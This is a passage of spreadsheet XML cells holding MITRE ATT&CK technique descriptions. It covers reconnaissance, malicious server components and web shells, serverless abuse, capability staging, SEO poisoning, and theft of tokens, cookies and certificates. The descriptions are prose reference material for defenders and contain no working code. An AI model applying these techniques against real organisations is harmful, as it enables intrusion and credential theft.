Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.  
Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). 
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. </t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)</t>
  </si>
  <si>
    <t>Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: &lt;code&gt;Get{Extension/Filter}Version&lt;/code&gt;, &lt;code&gt;Http{Extension/Filter}Proc&lt;/code&gt;, and (optionally) &lt;code&gt;Terminate{Extension/Filter}&lt;/code&gt;. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)
Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports &lt;code&gt;RegisterModule&lt;/code&gt;, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: &lt;code&gt;svchost.exe&lt;/code&gt;) load the service's DLL file, the location of which is stored in a Registry entry named &lt;code&gt;ServiceDll&lt;/code&gt;.(Citation: Microsoft System Services Fundamentals) The &lt;code&gt;termsrv.dll&lt;/code&gt; file, typically stored in `%SystemRoot%\System32\`, is the default &lt;code&gt;ServiceDll&lt;/code&gt; value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal &lt;code&gt;termsrv.dll&lt;/code&gt; functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the &lt;code&gt;termsrv.dll&lt;/code&gt; file or modifying the &lt;code&gt;ServiceDll&lt;/code&gt; value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. 
Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)
Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.</t>
  </si>
  <si>
    <t>Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).
Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the &lt;code&gt;DescribeSecurityGroups&lt;/code&gt; action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)</t>
  </si>
  <si>
    <t>Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)
Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  
</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.
Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)</t>
  </si>
  <si>
